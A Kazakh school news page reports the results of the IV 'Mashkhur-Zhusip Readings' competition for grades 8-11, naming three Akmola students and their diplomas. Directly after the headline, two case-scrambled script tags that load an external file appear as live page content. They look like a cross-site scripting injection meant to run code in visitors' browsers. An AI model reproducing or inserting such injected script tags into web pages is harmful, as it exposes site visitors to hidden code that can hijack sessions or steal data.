8-11 сынып оқушыларына арналған IV «Мәшһүр-Жүсіп оқулары» республикалық байқауының қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.09.2024

2024 жылғы 15-16 мамыр аралығында Павлодар облысы Екібастұз қаласында 8-11 сынып оқушыларына арналған IV «Мәшһүр-Жүсіп оқулары» республикалық байқауы өтті.

Байқаудың негізгі мақсаты – философ-ақынның рухани мұрасын дәріптеу, шығармаларында бейнеленген туған жерге сүйіспеншілік, белсенді азаматтық ұстанымды өскелең ұрпақта тәрбиелеу; тұлғаның зияткерлік және шығармашылық әлеуетін дамыту.

Байқау 4 бағыт бойынша өткізілді:

I бағыт – «Ақындар мүшәйрасы».

II бағыт – «Ғылыми зерттеу жобасын қорғау».

III бағыт - «Эссе жазу».

IV бағыт - «Мәшһүр-Жүсіпшығармаларындағы ұлы тұлғаларды сипаттау».

Байқауға Ақмола облысының 3 оқушысы қатысты.

1.«Ғылыми зерттеу жобасын қорғау» (зерттеу жоба) номинациясы бойынша Халел Нұрай - Көкшетау қаласы бойынша білім бөлімі Красный Яр ауылының № 2 жалпы орта білім беретін мектебінің 8-сынып оқушысы;

         2.«Эссе жазу» - десең, Қара өзіңді басқаның айнасымен» (эссе жазу) номинациясы бойынша Дулатова Алуа - Көкшетау қаласы, Абай атындағыдарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 11-сынып оқушысы;

         3.«Мәшһүр-Жүсіп  шығармаларындағы ұлы тұлғаларды сипаттау» номинациясы бойынша Кульчимбек Қарлығаш - Көкшетау қаласы, Абай атындағы  дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 9-сынып оқушысы.

IV «Мәшһүр-Жүсіп оқулары» республикалық байқауының қорытындысы бойынша І-дәрежелі дипломмен Дулатова Алуа марапатталды.

ІІ-дәрежелі дипломмен Халел Нұрай марапатталды.

         Шын жүректен құттықтаймыз!!!

Просмотров: 911


Пікір қосу



Деректерді қолтаңбаға қосу